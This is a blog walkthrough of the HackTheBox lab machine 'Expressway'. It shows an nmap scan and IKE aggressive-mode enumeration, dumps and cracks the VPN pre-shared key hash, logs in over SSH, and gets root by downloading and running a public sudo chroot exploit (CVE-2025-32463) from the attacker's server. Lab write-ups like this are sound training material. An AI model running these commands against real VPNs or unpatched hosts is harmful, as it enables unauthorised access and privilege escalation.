Expressway Writeup (HackTheBox Easy Machine)

-


Overview

Expressway is an easy Linux machine from HackTheBox. This box is very straightforward and can be seen as too easy by experienced hackers, but still deals with some interesting topics.

We start with classic port scan and discover IKE service on UDP port 500. During enumeration of this service, we get the PSK hash. We crack it and use it to login via SSH.

Once inside, we identify an old sudo version and find out that it’s vulnerable. We exploit the weakness and get the Root shell and full access.


Nmap scan

Starting with the Nmap scan.

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -A 10.10.11.87 -T5  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-17 18:17 CEST
Nmap scan report for 10.10.11.87
Host is up (0.024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Device type: general purpose|router|phone|storage-misc|media device
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (96%), Google Android 10.X (94%), HP embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:google:android:10 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 2.6.32 - 3.13 (96%), Linux 5.0 - 5.14 (96%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (96%), Linux 5.0 (95%), OpenWrt 22.03 (Linux 5.10) (95%), Android 9 - 10 (Linux 4.9 - 4.14) (94%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.10 (93%), HP P2000 G3 NAS device (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT      ADDRESS
1   23.31 ms 10.10.14.1
2   23.28 ms 10.10.11.87

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

The Nmap scan showed 1 open port. Port 22 for SSH. Immediately, it struck me as weird to have only SSH active on the machine, let’s perform more enumeration.

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sU -A -p 500 10.10.11.87 -T5   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-17 18:34 CEST
Nmap scan report for 10.10.11.87
Host is up (0.024s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 500/udp)
HOP RTT      ADDRESS
1   23.71 ms 10.10.14.1
2   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.83 seconds

Additionally, I performed UDP scan with Nmap as well and found out that port 500/udp is open too. Since I didn’t know anything about this port or the service it’s hosting, I did a small research.


IKE enumeration (port 500/udp)

UDP port 500 is primarily used by IPsec VPNs for the Internet Key Exchange (IKE) protocol, which is the initial phase for establishing a secure communication channel. (Gemini)

I did some digging and found this article on IKE pentesting: https://www.verylazytech.com/network-pentesting/ipsec-ike-vpn-port-500-udp. It takes information from HackTricks and covers everything from enumeration and fingerprinting to intercepting traffic and exploitation of weak configurations.


I learnt that I can use the “ike-scan” tool to fingerprint the VPN system. The output gives us several important information.

┌──(root㉿kali)-[/home/kali]
└─# ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=8078951d37b747fa)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.044 seconds (22.54 hosts/sec).  1 returned handshake; 0 returned notify

Firstly, we get the user ID “ike” and the domain “expressway.htb”. And secondly, we learn that aggressive mode is enabled, which means that VPN may leak group name and be vulnerable to credential brute-force attacks.

Since aggressive mode is enabled, we can also grab the PSK hash.

┌──(root㉿kali)-[/home/kali]
└─# ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=9ad4876029aa0dfc) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
dfb1792200ea6feda144568d315e8fc1bffc5387ca5f3409e541fa60190bf81939a30327fe952d3ed841013f5de184a0af14451bbf9b190a3072ac95c57a0f2e464870b597a32ddcbbcd7067788695c4475bef620bd3ebc98c7968665dc7719daa961f34b6c27d8202196730f0e920a2ca395385c98fecb9f2094b7e552df91e:ca00352b1ab93d7690dd654473d4e0ddbc10aba8e67e5a8a231b5980543e08bdb2402c306fbee1d42353bf9128eb6ccace4603cab686d5ca1204c59d046b1219e003d76952d1fe0c9edc2dc34c86c0eed5cd87b2767dac72ae9f90a197f5da2beccc54373fe823234cf9929368fb4156d6465da1259f4e276c74513174ed41c7:9ad4876029aa0dfc:091eb9970456e80b:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:74076e54b2d9e5b6f676651ce139f554bc130a01:0d15a32e18b90504f00a37300f277341033a957ead380080204a90c53000abe6:73f97132d3bdb54e83de9cb5e8e9cc686ee693c7
Ending ike-scan 1.9.6: 1 hosts scanned in 0.038 seconds (26.50 hosts/sec).  1 returned handshake; 0 returned notify

PSK (Pre-Shared Key) is a secret which must get exchanged at the start of the communication in order to create a secret channel between 2 endpoints (e.g. connecting via SSH).


Cracking Pre-Shared Key hash & getting user flag

Just like any hash, we can try to crack it using our favourite cracking tools. I used Hashcat for GPU-accelerated cracking, which was successful.

Hashcat cracked the PSK hash

Awesome! Now we have all the information we need. Using the cracked password and user “ike” we discovered earlier, we can login via SSH. The user flag waits in IKE’s home directory.

┌──(root㉿kali)-[/home/kali]
└─# ssh ike@10.10.11.87
ike@10.10.11.87's password: 

ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ ls -la
total 32
drwx------ 4 ike  ike  4096 Sep 16 10:23 .
drwxr-xr-x 3 root root 4096 Aug 14 22:48 ..
lrwxrwxrwx 1 root root    9 Aug 29 14:57 .bash_history -> /dev/null
-rw-r--r-- 1 ike  ike   220 May 18 22:58 .bash_logout
-rw-r--r-- 1 ike  ike  3526 Aug 28 12:49 .bashrc
drwxr-xr-x 3 ike  ike  4096 Aug 28 12:29 .local
-rw-r--r-- 1 ike  ike   807 May 18 22:58 .profile
drwx------ 2 ike  ike  4096 Sep 16 10:21 .ssh
-rw-r----- 1 root ike    33 Aug 14 22:48 user.txt


Exploiting vulnerable “sudo” version & getting root flag

As usual, I went down my Linux priv esc checklist. One of the first things I check are my user’s sudo privileges. This time, it didn’t have any. Another useful thing to check is the version of “sudo” itself.

ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password: 
Sorry, user ike may not run sudo on expressway.

ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

It’s always a good practice to google the version information you collect, because you never know if that version is vulnerable or not. So I researched sudo version “1.9.17” and found this Github repo (https://github.com/kh4sh3i/CVE-2025-32463) with an exploit to critical vulnerability that allows users to get immediate Root privileges.

The flaw affects the sudo program (versions before 1.9.17p1) and allows a local user to escalate privileges to root. It involves misuse of the “ — chroot” (or “-R”) option in sudo. Specifically, sudo can be tricked into loading a malicious “/etc/nsswitch.conf” file from a user-controlled directory when using “ — chroot”. (ChatGPT)

The exploit creates fake user-controlled directory and compiles malicious library that runs “/bin/bash” as Root. Then, it runs “sudo -R” command which executes our library and gives us Root shell.


I cloned the repo and transferred the exploit to the target machine via my Python server. After that, I just marked it as executable and ran it. The “woot!” message appeared and I had the Root shell.

ike@expressway:/tmp$ wget http://10.10.14.123:9000/exploit.sh
--2025-10-18 15:59:26--  http://10.10.14.123:9000/exploit.sh
Connecting to 10.10.14.123:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 637 [text/x-sh]
Saving to: ‘exploit.sh’

exploit.sh                                                                      100%[====================================================================================================================================================================================================>]     637  --.-KB/s    in 0.001s  

2025-10-18 15:59:26 (588 KB/s) - ‘exploit.sh’ saved [637/637]

ike@expressway:/tmp$ chmod +x exploit.sh 
ike@expressway:/tmp$ ./exploit.sh 
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/# cd /root
root@expressway:/root# ls -la
total 44
drwx------  6 root root 4096 Oct 18 15:33 .
drwxr-xr-x 18 root root 4096 Sep 16 16:02 ..
lrwxrwxrwx  1 root root    9 Aug 29 14:57 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwx------  3 root root 4096 Sep 16 16:02 .config
drwx------  3 root root 4096 Sep 16 16:02 .gnupg
-rw-------  1 root root   20 Sep 16 15:51 .lesshst
drwxr-xr-x  3 root root 4096 Sep 16 16:02 .local
lrwxrwxrwx  1 root root    9 Sep 16 10:24 .mariadb_history -> /dev/null
-rw-r--r--  1 root root  132 May 12 20:25 .profile
-rw-r-----  1 root root   33 Oct 18 15:33 root.txt
-rw-r--r--  1 root root   66 May 23 21:49 .selected_editor
drwx------  2 root root 4096 Sep 16 16:02 .ssh

Root flag sits patiently in the “/root” directory, and that’s the Expressway machine done.


Summary & final thoughts

Expressway is an easy Linux machine from HackTheBox. This box exposes to us the Internet Key Exchange (IKE) protocol, which is often overlooked but very important service. It’s essential for other secure protocols like SSH, because it handles the initial key exchange. After discovering that port 500/udp is open, we performed IKE enumeration. Since we find aggressive mode enabled, we could dump the PSK hash and crack it offline. After getting the password and logging in via SSH, we found unpatched sudo version and let us escalate our privileges to Root using an exploit.

Despite the fact that this machine can be completed just under couple of minutes, I think it does a great job by exposing such an unpopular (but important) protocol. After successful IKE enumeration, we get another very simple sudo exploit. I had fun learning a new methodology for a new protocol that I’ve never seen before. I’d recommend this machine to any beginner/intermediate hacker, solely because of the unique playthrough.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more